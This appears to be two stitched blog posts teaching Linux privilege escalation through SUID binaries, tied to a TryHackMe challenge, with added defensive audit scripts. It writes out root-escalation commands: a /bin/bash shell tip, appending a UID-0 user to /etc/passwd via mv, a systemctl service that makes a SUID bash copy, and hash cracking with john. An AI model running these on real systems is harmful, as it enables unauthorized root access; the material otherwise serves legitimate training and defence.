Linux privilege escalation suid

Linux Privilege Escalation: SUID

What is privilege escalation? Read how to escalate using SUID permission files.

Ben Spring


Set owner User ID up on execution

TryHackMe Christmas Challenge

This blog post will explain what privilege escalation is and how we can escalate our privileges using SUID permission files. Use these to solve challenge 8 of the Christmas Advent of Cyber!

What is Privilege Escalation?

Computer systems are designed to be used by multiple users, and privileges mean what a user is permitted to do. Common privileges include viewing and editing files, or modifying system files.

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

What is SUID?

Set owner User ID up on execution is a special type of file permission given to a file. When a user runs a program, given they have the correct read/execute rights, it will run using their account privileges. SUID allows a user to run a program using another user's privileges. To further understand file privileges, complete challenge 4 in the Christmas room or read the supporting material here.

In some cases, we can take advantage of having a file run as another user, to execute commands as them. You might be thinking, why allow anyone to run a file as another user in the first place? However, we need to have certain binaries run as root by a non-privileged user.

For example, if we change our password on Linux, the program that does this needs permission to write to the file system. You might not have permission to write to the /etc/ directory, but root does. This is why the passwd binary has the SUID bit set.

If a binary has the SUID bit set, an s appears in place of the owner's execute bit. If we check the file permissions of the passwd binary, we can see the permissions are -rwsr-xr-x.


The SUID bit is set on the execute permission, meaning when a user runs this, it will run as the file owner (which is root).

In essence, SUID files execute with the permission of the file owner.

Taking advantage of SUID files

Some administrators will set the SUID bit manually to allow certain programs to be run as them. Let's say you're a system administrator and a non-privileged user wants to run a program that requires higher privileges. You can set the SUID bit, and then the non-privileged user can execute the program without having any extra account permissions set.

We can scan the whole file system to find all files with the SUID bit set, with the following code:

find / -user root -perm -4000 -exec ls -ldb {} \;

The find command has a parameter where it can execute commands. So when it finds a file, it will list its permissions. The output will reveal something similar to this:

We can see a few binaries that run as the root user, which are legitimate programs that have the right permissions set to properly perform a task.

If a sysadmin has manually set an SUID bit on a binary, the code above will find it. Perhaps there is a custom file that has been created by another user that runs as root? You might be able to leverage this program to escalate your privileges or run commands you’d not normally be able to.

Tip for SUID Challenge, Question 1

A standard Linux binary (such as the find command) can have its file owner changed and an SUID bit set.

For example, if we wanted to see what user is the find command running as, we could do:

touch foo
find foo -exec whoami \;

This will find the file foo (which we've just created), then execute the command you stated in the -exec parameter. If find carries the SUID bit, whoami prints the owner of the find binary rather than your own user.

Tip for SUID Challenge, Question 2

Found a file that looks suspicious? Try running it and see what you can do with it. Run whoami to check whether the file actually runs as the file owner.

If you're given an option to run a command as another user, why not run /bin/bash to get a shell as that user.


Linux Privilege Escalation – SUID Binaries

Linux has several access attributes that can allow users or groups to perform certain actions against files, such as execute, modify or view files.

SUID (Set User ID) and SGID (Set Group ID) are permissions that allow users to execute a binary or script with the permissions of its owner (SUID) or of its group (SGID).

Some binaries have this permission by default because they need to perform certain actions with elevated privileges; for example, the passwd binary needs to run as root in order to change a user's password. However, certain binaries can be exploited to escalate privileges if they have the SUID bit set.

Finding Existing SUID Binaries

The following commands can be used to identify any existing binaries that have the SUID or SGID permission assigned to them:

find / -perm -u=s -type f 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null

The above uses the Linux find command, which is used to find files and directories, with the following flags:

  • / to specify to start searching from the root directory
  • -perm to match files with certain permission bits: -u=s matches files whose setuid bit is set, and -4000/-2000/-6000 match the SUID bit, the SGID bit, or both
  • -type to specify the type of entry to return (files, directories etc.)
  • 2>/dev/null to discard the permission-denied errors produced by directories the current user cannot read
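Both posts run a one-off find for SUID files; a defender wants the same listing in a form that can be diffed against a known-good baseline and that flags the binary names this page singles out (find, bash, grep, mv, systemctl). The script below is an added example, not code from either post; it assumes a Linux find and stat (GNU or busybox), and the watch list and the temporary sample used by its self-test are constructed.

```shell
#!/bin/sh
# Added SUID/SGID audit helper (not from the original posts). Assumes Linux
# find(1)/stat(1) that understand -perm and -c '%A %U %n' (GNU or busybox).
# Basenames this page describes as abusable when they carry the SUID bit.
WATCHLIST="find bash sh grep mv systemctl"

# list_setid DIR: print "mode owner path" for every SUID or SGID regular file
# below DIR; errors from unreadable directories are dropped.
list_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%A %U %n' {} + 2>/dev/null
}

# flag_setid DIR: print only entries whose basename is on WATCHLIST, prefixed
# with SUSPICIOUS so the output can be grepped or diffed against a baseline.
flag_setid() {
    list_setid "$1" | while read -r mode owner path; do
        name=$(basename "$path")
        for w in $WATCHLIST; do
            if [ "$name" = "$w" ]; then
                echo "SUSPICIOUS $mode $owner $path"
                break
            fi
        done
    done
}

# count_setid DIR: number of SUID/SGID files below DIR (store it as a baseline
# and alert when the number changes between scans).
count_setid() {
    list_setid "$1" | wc -l | tr -d ' '
}

# Stand-alone usage: "sh suid_audit.sh --run" audits the whole file system.
if [ "${1:-}" = "--run" ]; then
    count_setid /
    flag_setid /
fi
```

Save the baseline output of list_setid / once after installation; any later line that is new, or any SUSPICIOUS line at all, is worth a manual look.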

Automated enumeration tools such as LinPEAS can also find SUID binaries:

The following command can be used to find if an individual binary has the SUID permission set:

Identifying Vulnerable SUID Binaries

To identify if any of these can be exploited, GTFOBins can come in handy.

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. It lets you search for a binary or command and check whether SUID permissions on it could allow privilege escalation.

The search bar can be used to find the command and this will show ways to exploit such command. The “SUID” section is what this attack requires.

Automated enumeration tools such as LinPEAS can also flag vulnerable binaries:


Exploitation

Vulnerable SUID binaries can potentially be used to read or write to restricted files, upload/download files, execute commands as root or obtain a shell with elevated privileges.

Certain builtin Linux binaries can be easily exploited to gain a root shell:

SUID privileges on one of the above binaries almost always results in a full system compromise. This really exhaustive article explains in great detail how these can be exploited. A few more examples can be found below:

Example #1 – Grep (File Read)

Grep, a Linux command-line utility that uses regular expressions to search plain-text files, can be exploited to read restricted files:

The example below demonstrates how the /etc/shadow file, which contains user hashes, can be viewed as a normal user:

Once extracted, the hashes could then be cracked using tools such as Hydra or John the Ripper:

john --wordlist=wordlist_file hashes_file

Example #2 – MV (File Write)

MV, a Linux command-line utility used to move files or directories, can be used to move files on top of existing ones, effectively overwriting them.

This could be exploited by adding a new line to the /etc/passwd file, effectively adding a new user to the system.

Generating a new user hash with the following command:

openssl passwd -1 -salt salt password

Copying the /etc/passwd file to /tmp and appending a line for a new "stefhacked" user with UID 0 that uses the generated hash (quote the line with single quotes, or escape the dollar signs, so the shell does not expand the $ characters in the hash):

cd /tmp
cp /etc/passwd /tmp/passwd
echo 'stefhacked:<hash>:0:0:Ubuntu:/home/stef:/bin/bash' >> passwd

Replacing the /etc/passwd file with the new /tmp/passwd file and changing user to the newly created “stefhacked” user:

mv passwd /etc/passwd
su stefhacked
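Example #2 leaves two artefacts in /etc/passwd: a second UID-0 account and a password hash stored inline instead of the "x" that defers to /etc/shadow. The script below is an added example, not from the original post; it checks a passwd-format file for exactly those artefacts, and the sample file and its hash value are constructed placeholders.

```shell
#!/bin/sh
# Added /etc/passwd integrity check (not from the original post). Reports the
# signs of the tampering shown in Example #2 and prints nothing for a clean file.
# audit_passwd FILE: one finding per line, tagged with its passwd line number.
audit_passwd() {
    awk -F: '
        NF != 7 { printf "MALFORMED line %d: %s\n", NR, $0; next }
        $3 == 0 && $1 != "root" { printf "EXTRA_UID0 %s (line %d)\n", $1, NR }
        $2 == "" { printf "EMPTY_PASSWORD %s (line %d)\n", $1, NR }
        $2 != "" && $2 != "x" && $2 != "*" && $2 != "!" {
            printf "INLINE_HASH %s (line %d)\n", $1, NR
        }
    ' "$1"
}

# Constructed sample: three ordinary entries plus an appended line of the kind
# Example #2 produces (the hash field is a placeholder, not a real digest).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
stef:x:1000:1000:stef:/home/stef:/bin/bash
stefhacked:$1$salt$PLACEHOLDERHASH:0:0:Ubuntu:/home/stef:/bin/bash
EOF
audit_passwd "$SAMPLE"   # prints EXTRA_UID0 and INLINE_HASH for stefhacked (line 4)
rm -f "$SAMPLE"
```

Run audit_passwd /etc/passwd from cron or a file-integrity job; on a healthy system it prints nothing, so any output is actionable.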

Example #3 – SystemCTL (Root Shell)

systemctl, the command-line tool used to manage systemd services, can be exploited by creating a service that, when started, will execute an arbitrary command as root. In the example below it creates a SUID copy of the /bin/bash binary, therefore allowing an attacker to execute bash as root:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/stef && chmod +s /tmp/stef"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/stef -p

Conclusion

Although SUID is necessary in a Linux system to perform daily operations, and is often useful for system administrators who want to allow regular users to execute certain binaries or commands, it can pose a huge security risk.

The SUID permission should not be applied to any binaries that have the ability to execute code or commands, read/write to files or create services.
